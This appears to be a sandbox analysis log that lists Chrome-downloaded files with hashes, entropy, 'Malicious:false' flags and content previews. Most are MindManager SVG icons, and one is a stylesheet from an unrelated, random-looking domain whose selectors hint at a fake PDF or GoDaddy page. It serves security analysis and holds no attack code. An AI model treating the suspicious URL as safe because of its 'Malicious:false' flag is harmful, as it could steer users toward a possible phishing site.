                                                                Category:downloaded
                                                                Size (bytes):3481
                                                                Entropy (8bit):4.1252571529275235
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:8731E0F97AFA3D15B35456E95210C106
                                                                SHA1:00092CA77BE69D9940C0CBF61DF4BF3A81D55B79
                                                                SHA-256:3E8BF6D4B361D9C074F4A0454EAD3C38F8A2916F068794EE8ED1E819903831E2
                                                                SHA-512:6BF9ABAE76789634B3467E31D68189FD02A0186FB2E96F8725F4F142B3FB03B2F46CE9F64C6A2CB5A92B36B275B136379A1CCACC6ED0C1B2F99B18C87E699D09
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/content-manager/pinned.svg
                                                                Preview:<svg width="34" height="34" viewBox="0 0 34 34" fill="none" xmlns="http://www.w3.org/2000/svg">.<g clip-path="url(#clip0)">.<path d="M20.4703 6.89727H11.4878C11.3331 6.89727 11.1812 6.92765 11.032 6.98842C10.8829 7.04919 10.7531 7.13481 10.6426 7.2453C10.5266 7.36131 10.4382 7.49389 10.3774 7.64305C10.3222 7.78668 10.2918 7.93859 10.2863 8.0988V8.59598C10.2863 8.83905 10.3415 9.09869 10.452 9.37491C10.568 9.64559 10.7144 9.86933 10.8912 10.0461L11.7364 10.8913C11.7972 10.9521 11.8524 11.046 11.9021 11.1731C11.9574 11.2946 11.985 11.3996 11.985 11.4879V16.2278C11.985 16.3162 11.9601 16.4239 11.9104 16.5509C11.8552 16.6725 11.7972 16.7636 11.7364 16.8244L10.8829 17.6779C10.7116 17.8491 10.5708 18.0729 10.4603 18.3491C10.3443 18.6198 10.289 18.8794 10.2946 19.128V19.6252C10.2946 19.9566 10.4106 20.2384 10.6426 20.4704C10.8746 20.7024 11.1563 20.8184 11.4878 20.8184H14.1229L15.3824 30.4804C15.4045 30.6351 15.4708 30.7621 15.5813 30.8616C15.6973 30.9555 15.8299 31.0052 15.979 31.0107C16.061
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):650
                                                                Entropy (8bit):5.093721196700331
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:3D645E035B95B1E318455782592A44DD
                                                                SHA1:D9E53F334EB904AD5317090218F0222E9E510129
                                                                SHA-256:1B2DE130C9354ACD68710C0B14D706941F35B51AB416A976E0AE06881576D8A3
                                                                SHA-512:B640948DB34CE4E623F32A9B00965CD4DB0CE4EA0829FFAF8107311F1E33F89365160B6A001E24D5D3E7304888DC6545FE612046F4EC78C91D9940326A9C2F7E
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/content-manager/new-file-button.svg
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 12 16"><defs><style>.cls-1{fill:#fff;}.cls-2{fill:gray;}</style></defs><title>context_new</title><g id="Layer_2" data-name="Layer 2"><g id="Layer_1-2" data-name="Layer 1"><path class="cls-1" d="M1.85,15.5A1.31,1.31,0,0,1,.5,14.22V1.78A1.31,1.31,0,0,1,1.85.5H8.24L11.5,4.09V14.22a1.31,1.31,0,0,1-1.35,1.28Z"/><path class="cls-2" d="M8,1l3,3.28v9.94a.83.83,0,0,1-.85.78H1.85A.83.83,0,0,1,1,14.22V1.78A.83.83,0,0,1,1.85,1H8m.44-1H1.85A1.82,1.82,0,0,0,0,1.78V14.22A1.82,1.82,0,0,0,1.85,16h8.3A1.82,1.82,0,0,0,12,14.22V3.89L8.46,0Z"/><polygon class="cls-2" points="8 0.6 8 5 12 5 8 0.6"/></g></g></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):1718
                                                                Entropy (8bit):4.698748412487845
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:5958C19878B0B7C353424E312112358F
                                                                SHA1:1963EC6D03AB15CA231056666CE9177D90FBBD1A
                                                                SHA-256:A603BB5A7D17CD70F59A14C7FB2870F8066912D4F2B087F15DD4AEC4DCCD0566
                                                                SHA-512:DAEBF941D04A026A2EC4745886E1B3035F7E11E1D9EFDFA17550A9797EA5E9E89D64BE0E130C78EAD7192A1FDBE8BB9078894F6B586590047CE86CB114A02BAD
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/cloud-templates/templates/3circlevenndiagram.svg
                                                                Preview:<svg width="170" height="90" viewBox="0 0 170 90" fill="none" xmlns="http://www.w3.org/2000/svg">.<circle cx="68.8747" cy="29.8747" r="26.8747" fill="#FEEABA"/>.<circle cx="101.126" cy="29.8747" r="26.8747" fill="#EFD0CF"/>.<circle cx="84.5114" cy="60.1716" r="26.8747" fill="#B9DEF5"/>.<path fill-rule="evenodd" clip-rule="evenodd" d="M84.9 51.3562C79.6546 47.4071 75.9018 41.5816 74.6391 34.8769C77.1875 33.8444 79.9302 33.1915 82.7973 32.9883C70.5733 33.8434 60.6033 42.8733 58.3184 54.6467C61.5262 55.9992 65.0516 56.7469 68.7516 56.7469C74.8123 56.7469 80.4044 54.7407 84.9 51.3562Z" fill="#B8D1CC"/>.<path fill-rule="evenodd" clip-rule="evenodd" d="M84.5018 51.2349C89.6252 47.3169 93.2977 41.5974 94.5733 35.0223C91.4156 33.6908 87.9502 32.9454 84.3135 32.9224C84.3714 32.9221 84.4293 32.9219 84.4872 32.9219C97.6188 32.9219 108.551 42.34 110.896 54.7899C107.782 56.0519 104.377 56.7469 100.81 56.7469C94.6773 56.7469 89.0244 54.6927 84.5018 51.2349Z" fill="#AFC2D8"/>.<path fill-rule="evenodd
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):76344
                                                                Entropy (8bit):4.15874894143574
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:2E0E1AFC0B23E28E08DFA7A9D94A3B58
                                                                SHA1:85DC99F4A8A2FD1FA11157952F21FE83DFE429B2
                                                                SHA-256:7BB5DA6BFE6B071BDEE03C0296433D37583CC4A68936FF3165ED541A0BF94571
                                                                SHA-512:9466982869E6FEB8D24D97590C38E7F5D2083D7EAF6FC0D968FCED7E8E98FCABECD8808547F1C065BE0ECA0D7E7FD8BC15BF5097F203CDAAD5C8ADD204A45091
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/cloud-templates/use-cases/banners/banner_meetings_collaboration.svg
                                                                Preview:<svg width="650" height="180" viewBox="0 0 650 180" fill="none" xmlns="http://www.w3.org/2000/svg">..<g clip-path="url(#clip0_456_6925)">..<path d="M0 40.8984C0 35.3756 4.47715 30.8984 10 30.8984H640C645.523 30.8984 650 35.3756 650 40.8984V170.898C650 176.421 645.523 180.898 640 180.898H10C4.47715 180.898 0 176.421 0 170.898V40.8984Z" fill="#CCEBEA"/>..<path d="M487.71 24.4886C466.906 8.74384 440.797 5.09672 429.557 30.43C419.581 52.9145 441.379 78.406 451.504 97.327C463.572 119.877 435.324 154.386 454.481 171.606C471.758 187.135 519.182 177.234 536.971 164.669C555.005 151.932 563.06 128.147 580.987 114.772C605.684 96.3458 610.083 72.5527 606.876 57.812C592.863 -6.59837 521.963 50.4121 487.71 24.4886H487.71Z" fill="#A3DEDC"/>..<g opacity="0.8">..<path d="M511.82 86.9766L605.064 86.9766C608.138 86.9766 610.631 84.484 610.631 81.4093V27.2047C610.631 24.1299 608.138 21.6374 605.064 21.6374L511.82 21.6374C508.746 21.6374 506.253 24.1299 506.253 27.2047V81.4093C506.253 84.484 508.746 86.976
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (23398), with no line terminators
                                                                Category:downloaded
                                                                Size (bytes):23398
                                                                Entropy (8bit):5.104409455331282
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:C1C51D30D5E7094136F2D828349E520F
                                                                SHA1:10AE8971AD7A8798BC9732707FE4896B57541557
                                                                SHA-256:0C55057782E3B346C2B819574BFA916852BC8AC5BB4E01D56E8FBFFC22043C98
                                                                SHA-512:7CF90E58A309B53DB53570129780E0ABCEFA2802C1A6441C1A4B49DC265DF617220DC1072CEBDAE7A74C3CA85F5D87B606503BD48A60E049372BE5CAF39969F7
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://btee.pradjoun.com/12mjNuYi8NFabaxNC6717
                                                                Preview:*,input[type=radio]{box-sizing:border-box;padding:0}.alert,.radio label,.row.tile{margin-bottom:0}#sections,.input-group-addon,.table .table-cell,img{vertical-align:middle}#sections_pdf .pdfheader #pageName,.row.tile,.row.tile:not(.no-pick):active,.row.tile:not(.no-pick):hover,input{color:inherit}*,input{margin:0}.p,.text-body,.text-subtitle,h4{font-weight:400}*,.text-title{font-family:"Segoe UI","Helvetica Neue","Lucida Grande",Roboto,Ebrima,"Nirmala UI",Gadugi,"Segoe Xbox Symbol","Segoe UI Symbol","Meiryo UI","Khmer UI",Tunga,"Lao UI",Raavi,"Iskoola Pota",Latha,Leelawadee,"Microsoft YaHei UI","Microsoft JhengHei UI","Malgun Gothic","Estrangelo Edessa","Microsoft Himalaya","Microsoft New Tai Lue","Microsoft PhagsPa","Microsoft Tai Le","Microsoft Yi Baiti","Mongolian Baiti","MV Boli","Myanmar Text","Cambria Math"}.websitesections{height:100%;width:100vw;position:relative}#sections_godaddy,#sections_pdf{display:flex;flex-direction:column;height:100vh}#sections_pdf a{color:#fff;text-deco
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):490
                                                                Entropy (8bit):5.094459946041693
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:E2D58870032D2E75D49601558760C928
                                                                SHA1:0A61929D58FF48271F21EB272558172424AC2B32
                                                                SHA-256:33B5916FD3560DD181FD60798899D6516ADEC95A0A17950659FD5213C883835D
                                                                SHA-512:67D20124521B6A3CBA6D83D61E3010F29A3BA4951C8729B6B37252DE57918EBC36B5850BB30ECDD1733B4033C1B74EDF323AC11241BEE8A753E7EB25B3F7D1EF
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/toolbar/svg/assets_right_chevron.svg
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="-1 -1 12 20.99"><defs><style>.cls-1{fill:#3a52a4;}</style></defs><title>right chevron</title><g id="Layer_2" data-name="Layer 2"><g id="Layer_1-2" data-name="Layer 1"><path class="cls-1" stroke-width="2" stroke="#3a52a4" d="M.31,19a.39.39,0,0,1-.16-.11.5.5,0,0,1,0-.7L8.79,9.5.15.85A.48.48,0,0,1,0,.5.48.48,0,0,1,.15.15.48.48,0,0,1,.5,0,.48.48,0,0,1,.85.15l9,9a.51.51,0,0,1,0,.71l-9,9A.39.39,0,0,1,.69,19a.55.55,0,0,1-.38,0Z"/></g></g></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):2347
                                                                Entropy (8bit):4.926798915416577
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:4E6A608A50AFF3BB03AA997F87086E88
                                                                SHA1:9431C4B95C53699A463CAEBC35F6DC2D36C2A632
                                                                SHA-256:4290DA6605A3F584E745380A7A29CD752B7E61C14DA2EDCFAF721B9B4D57D0B0
                                                                SHA-512:45EE0B9D1A4D6DA5FE6C65C9C4A7BAE7D18BD71CF9E90F5362CBC34E2B52A867E658C0D9B6E4F767C283F7123D985CA094C31F94C0640B20960A0BFD642B3BF5
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/IconsSVG/calendar.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#d5d6d8;}.cls-2{fill:#eeeff2;}.cls-3{fill:#fff;}.cls-4{fill:#51ace6;}.cls-5{fill:#4798cc;}.cls-6{fill:#b3b3b3;}</style></defs><title>calendar_16</title><path class="cls-1" d="M1.33,16H14.67A1.34,1.34,0,0,0,16,14.67V5H0v9.67A1.34,1.34,0,0,0,1.33,16Z"/><path class="cls-2" d="M1.33,15.33H14.67A1.34,1.34,0,0,0,16,14V4.33H0V14A1.34,1.34,0,0,0,1.33,15.33Z"/><path class="cls-3" d="M1.33,14.5a.83.83,0,0,1-.83-.83V4.83h15v8.84a.83.83,0,0,1-.83.83Z"/><path class="cls-2" d="M15,5.33v8.34a.33.33,0,0,1-.33.33H1.33A.33.33,0,0,1,1,13.67V5.33H15m1-1H0v9.34A1.34,1.34,0,0,0,1.33,15H14.67A1.34,1.34,0,0,0,16,13.67V4.33Z"/><rect class="cls-2" y="5" width="16" height="0.33"/><path class="cls-4" d="M.5,4.5V1.33A.83.83,0,0,1,1.33.5H14.67a.83.83,0,0,1,.83.83V4.5Z"/><path class="cls-5" d="M14.67,1a.33.33,0,0,1,.33.33V4H1V1.33A.33.33,0,0,1,1.33,1H14.67m0-1H1.33A1.34,1.34,0,0,0,0,1.33V5H16V1.33A1.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):42871
                                                                Entropy (8bit):4.204207993375663
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:83504FA0F4C1D275C1D8F67B4E759847
                                                                SHA1:AE4B08BA3B596005D3A2056739528F62B5B9EF28
                                                                SHA-256:4B0A6A7BB470D2754DDE4D1C36080AD62CE030D8CFF0034AF9A5D627C82B4FE5
                                                                SHA-512:95EAFE10247D89684A62B8D6B6358964DE77481DCAE5074F87D2F62F1464E980510A92F19BEF63B6619B14F47B853444D80CF2065A75588AA1DE2A75DF65A11A
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/cloud-templates/use-cases/cards/cards_dashboards.svg
                                                                Preview:<svg width="200" height="250" viewBox="0 0 200 250" fill="none" xmlns="http://www.w3.org/2000/svg">..<g clip-path="url(#clip0_456_4892)">..<rect width="200" height="250" rx="10" fill="#CADEF7"/>..<path d="M113.588 64.8353C126.213 64.5378 138.943 61.1214 151.356 63.879C174.037 68.9177 191.267 96.9759 188.384 124.178C185.502 151.381 162.957 173.488 139.932 171.69C132.495 171.109 124.865 168.402 117.75 171.043C108.27 174.562 102.452 186.616 93.0283 190.349C80.2664 195.403 64.0417 182.716 54.2184 174.034C44.0856 165.08 32.3326 151.717 27.647 137.396C22.8129 122.621 23.679 103.046 27.2996 88.0486C30.5442 74.6065 38.7037 63.2785 49.5881 57.8285C62.8553 51.1849 73.6842 56.1607 86.6143 60.5979C95.3757 63.6105 104.469 65.039 113.588 64.8353Z" fill="#A7C9F3"/>..<path d="M167.872 62.3008H66.9683C62.5133 62.3008 58.9019 65.9123 58.9019 70.3673V142.434C58.9019 146.889 62.5133 150.501 66.9683 150.501H167.872C172.327 150.501 175.939 146.889 175.939 142.434V70.3673C175.939 65.9123 172.327 62.3008 167.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):582
                                                                Entropy (8bit):4.803251896137869
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:89640EDA45D59A6FEF3DB22054DA4427
                                                                SHA1:603602F06060957028D65E4CD1369ABD237B11DD
                                                                SHA-256:D46246B5DF7C5042AC167819C8BB5E0649BC4D623E1F2651DBD779356D2C43C9
                                                                SHA-512:B358B8E01BB09D3C038289D98EA9216F59F791DB162950865E3411B44B32E0A8B50EF9AF3BCA3AF1B6FD3FF0989E7B377A88961D87A27D736A5F3B44B7DAB59E
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/IconsSVG/glasses.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#1c97e6;}.cls-2{fill:#fff;}</style></defs><title>glasses_16</title><rect class="cls-1" y="5" width="5" height="3" rx="1" ry="1"/><rect class="cls-1" x="11" y="5" width="5" height="3" rx="1" ry="1"/><rect class="cls-1" x="7" y="6" width="4" height="2" rx="0.75" ry="0.75"/><circle class="cls-1" cx="4" cy="8" r="3"/><circle class="cls-2" cx="4.07" cy="8.07" r="2.07"/><circle class="cls-1" cx="12" cy="8" r="3"/><circle class="cls-2" cx="12" cy="8" r="2.14"/></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):1079
                                                                Entropy (8bit):5.126046368765254
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:EB82BC9E7561FAB63FA579D29F1A568A
                                                                SHA1:C86166B0861D73C1746489CB7CADEEF3F09E49A4
                                                                SHA-256:408D65BF06ADAEBF84F38779691F6EF1F7A0898547AFEF14F38F2F82ACF11ABB
                                                                SHA-512:A14A4D4C89410A68FCE792521DDF8A04174979D3942FC391795DD004BB82969C506C9E972C399EB477E5687F4277BF8C207383FCA77CC2919E2D03DDD4F0F66C
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/IconsSVG/lightbulb.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#fbb400;}.cls-2{fill:#fbcd58;}.cls-3{fill:#999;}.cls-4{fill:gray;}.cls-5{fill:#fff;}</style></defs><title>light_bulb_16</title><path class="cls-1" d="M7.36,13.5l-.8-2.39L6.37,11a5,5,0,1,1,4.26,0l-.19.09-.8,2.39Z"/><path class="cls-2" d="M8.5,2a4.5,4.5,0,0,1,1.92,8.57l-.39.18-.14.4L9.28,13H7.72l-.61-1.85L7,10.75l-.39-.18A4.5,4.5,0,0,1,8.5,2m0-1A5.5,5.5,0,0,0,6.16,11.47L7,14h3l.84-2.53A5.5,5.5,0,0,0,8.5,1Z"/><rect class="cls-3" x="6" y="13" width="5" height="3" rx="1" ry="1"/><rect class="cls-4" x="6" y="14" width="4" height="0.5"/><rect class="cls-4" x="6" y="13" width="4" height="0.5"/><rect class="cls-5" x="8" y="7" width="1" height="5" transform="translate(17 19) rotate(180)"/><circle class="cls-5" cx="8.5" cy="6.5" r="1.5"/><rect class="cls-1" x="15" y="6" width="1" height="1"/><rect class="cls-1" x="1" y="6" width="1" height="1"/><rect class="cls-1" x="13" y="1" wid
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):688
                                                                Entropy (8bit):5.088435945314226
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:2CA54DF88C9BCE9CE273CD638A88EA3C
                                                                SHA1:4E232585468C02CB6B01A42B23E21DAA68FD116E
                                                                SHA-256:3F04CFEB68505A2B98877AC97A476BDB5B8C6EB5A6998F5E0152ECB2C29452C3
                                                                SHA-512:C5B765F845D25CDB2419FBA0ACCC243DDA6F2D16D2B69673FD6CAE3AD6B7CE09C4B23659BE2FDD8CAD16050AB07086CC18479A056A8E7AF8458506132930DFAF
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/icon-hidden-relationships.svg
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#28559c;}</style></defs><title>relationship</title><g id="Layer_2" data-name="Layer 2"><g id="Layer_1-2" data-name="Layer 1"><polygon class="cls-1" points="11 0 11 4.97 15.15 2.49 11 0"/><circle class="cls-1" cx="3" cy="14" r="2"/><path class="cls-1" d="M11.5,8H1.5C1.23,8,1,7.68,1,7.3V3.7c0-.38.23-.7.5-.7h10c.27,0,.83-1,0-1H1.5A1.61,1.61,0,0,0,0,3.7V7.3A1.61,1.61,0,0,0,1.5,9h10a1.5,1.5,0,0,0,1.36-1Z"/><path class="cls-1" d="M14.5,8H9L5,9h9.5c.27,0,.5.32.5.7v2.6c0,.38-.23.7-.5.7H4.5c-.27,0-.5-.32-.5-.7v1.6a1.33,1.33,0,0,0,.5.1h10A1.61,1.61,0,0,0,16,12.3V9.7A1.61,1.61,0,0,0,14.5,8Z"/></g></g></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):1117
                                                                Entropy (8bit):4.997374337569881
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:B76BF546D0031D3E603717284122DC1E
                                                                SHA1:FC3BC7C8B376AB50B422033467F7E74E4FB18E5C
                                                                SHA-256:53FAEE07C8DD734B963A9F7EE3B7CC02C1EF742E65E3267FCDB3CC1FCB23CEAD
                                                                SHA-512:EC04D34F78B0CC5A72AF6DB911EE01354F3AB01878FE23DA48D45A5AD04FF7EFC5AA16FDE2F635F83916B0F15358948DE4A4034F0F34495545C288F5A4693445
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/content-manager/pencil.svg
                                                                Preview:<?xml version="1.0" encoding="utf-8"?>. Generator: Adobe Illustrator 18.1.1, SVG Export Plug-In . SVG Version: 6.00 Build 0) -->.<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">.<svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px".. viewBox="-69 38 18 18" enable-background="new -69 38 18 18" xml:space="preserve">.<path fill="#3A52A4" d="M-51.8,38.8c0.3,0.3,0.4,0.5,0.6,0.9c0.2,0.4,0.2,0.7,0.2,1s-0.1,0.7-0.2,1c-0.1,0.3-0.3,0.6-0.6,0.9..L-63.3,54c0,0,0,0-0.1,0.1c-0.1,0.1-0.1,0-0.1,0l-4.9,1.8h-0.1h-0.1c-0.1,0-0.1,0-0.2,0c-0.1,0-0.1-0.1-0.1-0.1s-0.1-0.1-0.1-0.2..c0-0.1,0-0.2,0-0.2l1.8-4.9v-0.1c0,0,0-0.1,0.1-0.1l11.5-11.5c0.3-0.3,0.5-0.4,0.9-0.6s0.7-0.2,1-0.2s0.7,0.1,1,0.2..C-52.4,38.3-52.1,38.5-51.8,38.8z M-63.8,53.3l10-10l-2.5-2.5l-10,10l-1.4,4L-63.8,53.3z M-52.4,41.9c0.2-0.2,0.3-0.4,0.4-0.6..s0.1-0.4,0.1-0.7c0-0.2,0-0.5-0.1-0.7c-0.1-0.2-0.2-0.4-0.4-0.6c-0.2,0-0.4
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):890
                                                                Entropy (8bit):5.038658961329734
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:B7BF4EB1582D572965E1F971EBAD3658
                                                                SHA1:636B482079802818A38175F024FFFA65A92CCB28
                                                                SHA-256:0F9DE8EE8D817AEB3BDEE02B5635B4C3975DEEBF21F61DEA8726399387F1763E
                                                                SHA-512:14611EA1BF64E5289EDE5E63AD98517F4371774E80D4E808AA6B149739C50501DD9E74D054D7CC98F04F8CE2533A2B99D48ADAED10A1F0E816A0D160786D1E0A
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/content-manager/close-small.svg
                                                                Preview:<?xml version="1.0" encoding="utf-8"?>. Generator: Adobe Illustrator 19.1.0, SVG Export Plug-In . SVG Version: 6.00 Build 0) -->.<svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px".. width="15.6px" height="15.6px" viewBox="0 0 15.6 15.6" enable-background="new 0 0 15.6 15.6" xml:space="preserve">.<g>..<path fill="#3a52a4" stroke="#3a52a4" stroke-width="1" d="M8.6,7.8l6.8,6.8c0.1,0.1,0.2,0.3,0.2,0.4s-0.1,0.3-0.2,0.4c-0.1,0.1-0.1,0.1-0.2,0.1s-0.2,0-0.2,0...c-0.1,0-0.1,0-0.2,0s-0.1-0.1-0.2-0.1L7.8,8.6L1,15.4c-0.1,0.1-0.1,0.1-0.2,0.1s-0.1,0-0.2,0c-0.1,0-0.2,0-0.2,0s-0.1-0.1-0.2-0.1...C0.1,15.3,0,15.2,0,15s0.1-0.3,0.2-0.4L7,7.8L0.2,1C0.1,0.9,0,0.8,0,0.6s0.1-0.3,0.2-0.4S0.4,0,0.6,0S0.9,0.1,1,0.2l6.8,6.8...l6.8-6.8C14.7,0.1,14.8,0,15,0s0.3,0.1,0.4,0.2s0.2,0.3,0.2,0.4S15.6,0.9,15.4,1L8.6,7.8z"/>.</g>.</svg>.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):50060
                                                                Entropy (8bit):4.245164619558483
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:9E47930D95ED2FDE0DC114EEE6325041
                                                                SHA1:40B9003A4BCB8D3FEC584A85D85312E9F803EC2C
                                                                SHA-256:4E9A2461AE68FF23EACF12A4FADB17CB312437497F5B9C3FF316B5D991D49C1D
                                                                SHA-512:3327AE016BD9DDDCFA4B96E8FD0C56AFB795BAF3E6CD229C5E4E5F230C36FA2C4B8ECAEBAEC9BBA79A7151E478C544BE9E6C38054D9EC340C1A4550E66181C28
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/cloud-templates/use-cases/cards/cards_plans_roadmaps.svg
                                                                Preview:<svg width="200" height="250" viewBox="0 0 200 250" fill="none" xmlns="http://www.w3.org/2000/svg">..<g clip-path="url(#clip0_456_4354)">..<rect width="200" height="250" rx="10" fill="#CCEBEA"/>..<g clip-path="url(#clip1_456_4354)">..<path d="M107.362 83.1096C120.475 82.8496 133.697 79.8632 146.59 82.2737C170.147 86.6782 188.043 111.204 185.05 134.983C182.056 158.761 158.639 178.086 134.725 176.513C127 176.006 119.075 173.639 111.686 175.948C101.838 179.025 95.7957 189.561 86.008 192.824C72.7528 197.242 55.901 186.152 45.698 178.563C35.1736 170.736 22.9663 159.055 18.0996 146.537C13.0786 133.621 13.9783 116.51 17.7388 103.401C21.1088 91.6509 29.5837 81.7488 40.8888 76.9848C54.6688 71.1775 65.9162 75.527 79.3461 79.4056C88.4461 82.039 97.8907 83.2877 107.362 83.1096V83.1096Z" fill="#9BDDDB"/>..<path d="M105.4 199.677V173.677C105.4 171.15 107.448 169.102 109.976 169.102H174.724C177.251 169.102 179.3 171.15 179.3 173.677V199.677C179.3 202.204 177.251 204.253 174.724 204.253H109.976C107.44
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):1788
                                                                Entropy (8bit):4.549597920315008
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:F46CCE15D915F61EE4D209C35A2FE4F4
                                                                SHA1:700BF5790E9D8D036540726C6B95F9470C59DB2D
                                                                SHA-256:65D881A3DBDEF20C1E266D2EFBD16A407523F9738C17544001663944E19268D8
                                                                SHA-512:5CE0C8C4AE73AF0C72D0ADF1541179AFC4C4EEEB8B63ECA6D5819858A47BBAD81CD65B06357DCA2209287F84592CF77CB5FBE50D4EE045CA4BAF83AAFF419A80
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/PrioritiesSVG/roPriority09.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#9a9aa3;}.cls-2{fill:#727272;}.cls-3{fill:#fff;}.cls-4{fill:gray;}</style></defs><title>roPriority09</title><rect class="cls-1" x="0.5" y="0.5" width="15" height="15" rx="0.5" ry="0.5"/><path class="cls-2" d="M15,1V15H1V1H15m0-1H1A1,1,0,0,0,0,1V15a1,1,0,0,0,1,1H15a1,1,0,0,0,1-1V1a1,1,0,0,0-1-1Z"/><path class="cls-2" d="M6.33,13.46,7,11.36a3.51,3.51,0,0,0,1.37.29A2.12,2.12,0,0,0,10.51,10h0a1.66,1.66,0,0,1-.59.25,3.8,3.8,0,0,1-.79.1A3,3,0,0,1,6.44,8.93a3.73,3.73,0,0,1-.6-2,3.37,3.37,0,0,1,.93-2.36,3.22,3.22,0,0,1,2.48-1,3.84,3.84,0,0,1,2.86,1.24,4.9,4.9,0,0,1,1.2,3.54,6.56,6.56,0,0,1-.31,2,6.21,6.21,0,0,1-.9,1.78,4.2,4.2,0,0,1-1.51,1.28,4.39,4.39,0,0,1-2.05.48A5.06,5.06,0,0,1,6.33,13.46ZM9.76,8.65c.69,0,1-.2,1-.6a2.07,2.07,0,0,0-.49-1.41,1.36,1.36,0,0,0-1.05-.58.88.88,0,0,0-.72.33,1.16,1.16,0,0,0-.28.79,1.54,1.54,0,0,0,.37,1A1.44,1.44,0,0,0,9.76,8.65Z"/><path class="cls-3
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):487
                                                                Entropy (8bit):5.243496002107376
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:933F05A853C4F44DCD431D17B62C9A97
